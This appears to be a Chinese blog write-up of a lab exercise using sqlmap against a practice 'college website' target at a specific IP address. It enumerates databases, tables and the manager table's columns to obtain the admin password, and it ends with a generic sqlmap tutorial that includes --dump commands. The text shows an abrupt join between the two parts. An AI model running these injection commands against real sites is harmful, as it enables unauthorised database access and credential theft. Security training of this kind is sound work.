sqlmap实战,攻击学校学院网站(靶机)

本文详细介绍了使用sqlmap工具攻击学院网站靶机,通过寻找注入点,利用sqlmap获取管理员密码的过程。经过一步步操作,确定数据库、表及字段,最终揭示了经过base64和MD5双重加密的密码。

sqlmap实战,获取学院网站(靶机)管理员密码

首先获取学院网址,寻找注入点,利用上节学到的sqlmap使用方法
然后直接放进sqlmap里运行,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027
如下图

在这里插入图片描述
接着找出所有数据库,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 --dbs
运行结果如下
在这里插入图片描述
接着选择rjxy数据库,找出所有的表,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 -D rjxy --tables
运行结果如下
在这里插入图片描述
要寻找管理员密码,所以选择manager表,找出里面所有字段
输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 -D rjxy -T manager --columns
结果如下

### 如何使用Sqlmap进行SQL注入攻击测试 #### 安装Sqlmap 为了开始使用 Sqlmap 工具,首先需要安装该软件。可以通过访问官方 GitHub 页面下载最新版本并按照说明完成安装过程[^1]。 #### 配置环境准备 确保操作系统环境中已正确配置 Python 解释器以及其他依赖项以便顺利运行 Sqlmap 脚本文件[^3]。 #### 基础命令结构 基本的 Sqlmap 执行语句如下所示: ```bash sqlmap -u "http://example.com/vulnerable_page?id=1" ``` 这条指令指定了要扫描的目标 URL 参数 `id` 的值为 `1` 。这一步骤用于确认是否存在潜在可被利用的 SQL 注入点以及识别后台使用的数据库管理系统(DBMS) 类型[^5]。 #### 获取更多信息 一旦发现了有效的注入位置,则可通过附加选项进一步探索受影响系统的内部细节: - **--dbs**: 列举所有可用数据库名称。 - **-D db_name --tables**: 显示特定数据库内的表名列表。 - **-T table_name --columns**: 展示某张表格里的列定义详情。 - **-C column --dump**: 导出指定字段的数据记录集。 例如, 若要获取整个架构视图,可以依次输入上述各条目对应的完整调用形式: ```bash # 查看有哪些库 sqlmap -u "http://example.com/vulnerable_page?id=1" --dbs # 选定某个具体库后查看其下的表 sqlmap -u "http://example.com/vulnerable_page?id=1" -D 'database_name' --tables # 探索单个表内含有的列项目 sqlmap -u "http://example.com/vulnerable_page?id=1" -D 'database_name' -T 'table_name' --columns # 把关注的重点放在某些重要数据上 sqlmap -u "http://example.com/vulnerable_page?id=1" -D 'database_name' -T 'table_name' -C 'column_name' --dump ``` 请注意,在实际操作过程中应当遵循合法合规的原则来进行安全评估活动,严禁未经授权擅自尝试入侵他人信息系统的行为[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值